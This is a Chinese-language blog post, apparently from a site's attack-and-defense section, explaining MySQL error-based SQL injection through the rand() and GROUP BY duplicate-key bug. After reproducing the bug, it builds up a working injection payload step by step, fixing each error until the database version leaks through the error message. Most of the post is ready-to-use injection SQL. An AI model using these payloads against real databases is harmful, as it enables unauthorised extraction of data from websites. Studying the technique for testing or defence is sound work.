网站MYSQL数据库高级爆错注入原分析

2023-12-07 0 135

这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate key error. 重现过程:

SQL Code复制内容到剪贴板

  • usemysql;
  • createtabler1(aint);insertintor1values(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);
  • selectleft(rand(),3),afromr1groupby1;
  • selectleft(rand(),3),a,count(*)fromr1groupby1;
  • selectround(rand(1),1),a,count(*)fromr1groupby1;
  • 于是便可以这样拿来爆错注入了。复制代码代码如下: select count(*),concat((select version()),left(rand(),3))x from inform<span style=\”line-height:1.5;\”>ation_schema.tables group by x;</span>

    尝试拿来实战 复制代码代码如下: select * from user where user=\’root\’ and (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x);

    提示错误 选择的列应该为一个。那么。我们换一下

    复制代码代码如下: select * from user where user=\’root\’ and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x));<span style=\”font-family:\’sans serif\’, tahoma, verdana, helvetica;font-size:12px;line-height:1.5;\”></span>复制代码代码如下: 1248 (42000): Every derived table must have its own alias

    提示多表查询要有别名 那好办复制代码代码如下: select * from user where user=\’root\’ and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x)a);

    或者复制代码代码如下: select * from user where user=\’root\’ and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x) as lusiyu);

    成功爆粗注入了.

    作者: 小残 绳命不息 |折腾不止

    收藏 (0) 打赏

    感谢您的支持,我会继续努力的!

    打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
    点赞 (0)

    悠久资源 脚本攻防 网站MYSQL数据库高级爆错注入原分析 https://www.u-9.cn/security/gongfang/124618.html

    常见问题

    相关文章

    发表评论
    暂无评论
    官方客服团队

    为您解决烦忧 - 24小时在线 专业服务